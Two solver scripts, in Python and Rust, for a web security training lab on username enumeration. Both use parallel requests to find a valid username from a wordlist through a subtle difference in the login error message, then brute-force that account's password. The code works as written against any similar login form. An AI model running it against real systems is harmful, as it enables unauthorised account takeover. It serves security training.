File: with-python/server-side/authentication/02-username-enumeration-via-sublty-different-responses.py
import requests
from lib import generate_parser, SESSION
import time
from multiprocessing import Pool
from itertools import repeat

USERNAME = ""
PASSWORD = ""


def enumerate_username(username: str) -> str | None:
    print(f"[~] Trying Username: {username}", end="\r", flush=True)

    try:
        response = SESSION.post(
            url=lab_url + "/login",
            data={"username": username, "password": "test"},
        )

        if "Invalid username or password." not in response.text:
            print(f"\n[+] Username Found: {username}")
            return username

    except requests.RequestException as error:
        print("[-] Error", error)

    return None


def enumerate_password(args) -> str | None:
    (username, password) = args

    print(f"[~] Trying Password: {password}", end="\r", flush=True)

    try:
        response = SESSION.post(
            url=lab_url + "/login", data={"username": username, "password": password}
        )

        if "Invalid username or password " not in response.text:
            print(f"\n[+] Password Found: {password}")
            return password

    except requests.RequestException as error:
        print("[-] Error", error)

    return None


if __name__ == "__main__":
    start_time = time.perf_counter()

    args = generate_parser()

    lab_url = args.lab_url.strip("/")

    print("[!] Enumerating Username")

    with open("../payloads/authentication/usernames.txt", "r") as usernames:
        usernames_array = [username.strip() for username in usernames.readlines()]

        with Pool(10) as p:
            for result in p.imap(enumerate_username, usernames_array):
                if result is not None:
                    USERNAME = result
                    p.terminate()
                    break

    print("[!] Enumerating Password")

    with open("../payloads/authentication/passwords.txt", "r") as passwords:
        passwords_array = [password.strip() for password in passwords.readlines()]
        args_array = zip(repeat(USERNAME), passwords_array)

        with Pool(10) as p:
            for result in p.imap(enumerate_password, args_array):
                if result is not None:
                    PASSWORD = result
                    p.terminate()
                    break

    end_time = time.perf_counter()
    print(f"[+] Total Time Taken: {end_time - start_time}")

    print("[!] Username and Password found successfully")
    print(f"[+] Username: {USERNAME}")
    print(f"[+] Password: {PASSWORD}")
    print("[!] Lab is solved succesfully!!!")

File: with-rust/server-side/authentication/src/bin/02-username-enumeration-via-sublty-different-responses.rs
use rayon::prelude::*;
use server_side_authentication::{HTTP_CLIENT, generate_clap_parser};
use std::{
    fs,
    io::{Write, stdout},
    sync::{
        Arc,
        atomic::{AtomicBool, Ordering},
    },
    time::{Duration, Instant},
};

fn enumerate_username(lab_url: &str, username: &str) -> Option<String> {
    print!("[~] Trying Username: {}\r", username);
    stdout().flush().unwrap();

    let response = HTTP_CLIENT
        .post(format!("{}/login", lab_url))
        .form(&[("username", username), ("password", "test")])
        .send()
        .expect("Failed to make the POST request to /login");

    if !response
        .text()
        .expect("Failed to extract text")
        .contains("Invalid username or password.")
    {
        return Some(username.to_string());
    }

    None
}

fn enumerate_password(lab_url: &str, username: &str, password: &str) -> Option<String> {
    print!("[~] Trying Password: {}\r", password);
    stdout().flush().unwrap();

    let response = HTTP_CLIENT
        .post(format!("{}/login", lab_url))
        .form(&[("username", username), ("password", password)])
        .send()
        .expect("Failed to make the POST request to /login");

    if !response
        .text()
        .expect("Failed to extract text")
        .contains("Invalid username or password ")
    {
        return Some(password.to_string());
    }

    None
}

fn main() {
    let args = generate_clap_parser();

    let lab_url = args.lab_url.as_str().trim_end_matches("/");

    let username_stop_flag: Arc<AtomicBool> = Arc::new(AtomicBool::new(false));
    let password_stop_flag: Arc<AtomicBool> = Arc::new(AtomicBool::new(false));

    let start_time: Instant = Instant::now();

    logger::info("Enumerating Username");

    let username = fs::read_to_string("../payloads/authentication/usernames.txt")
        .expect("File not found: usernames.txt")
        .par_lines()
        .find_map_first(|username| {
            if username_stop_flag.load(Ordering::Relaxed) {
                return None;
            }

            let result: Option<String> = enumerate_username(lab_url, username);

            if let Some(value) = result {
                username_stop_flag.store(true, Ordering::Relaxed);
                return Some(value);
            }

            None
        })
        .expect("[-] Failed to enumerate username.");

    println!();
    logger::success(format!("Username Found: {}", username).as_str());

    logger::info("Enumerating Password");

    let password: String = fs::read_to_string("../payloads/authentication/passwords.txt")
        .expect("File not found: passwords.txt")
        .par_lines()
        .find_map_first(|password| {
            if password_stop_flag.load(Ordering::Relaxed) {
                return None;
            }

            let result: Option<String> = enumerate_password(lab_url, &username, password);

            if let Some(value) = result {
                password_stop_flag.store(true, Ordering::Relaxed);
                return Some(value);
            }

            None
        })
        .expect("[-] Failed to enumerate password");

    println!();
    logger::success(format!("Password Found: {}", password).as_str());

    let total_time_taken: Duration = start_time.elapsed();
    logger::info(format!("Total Time Taken: {}s", total_time_taken.as_secs_f64()).as_str());

    logger::success(format!("Username: {}", username).as_str());
    logger::success(format!("Password: {}", password).as_str());
    logger::success("Lab solved successfully!!!");
}
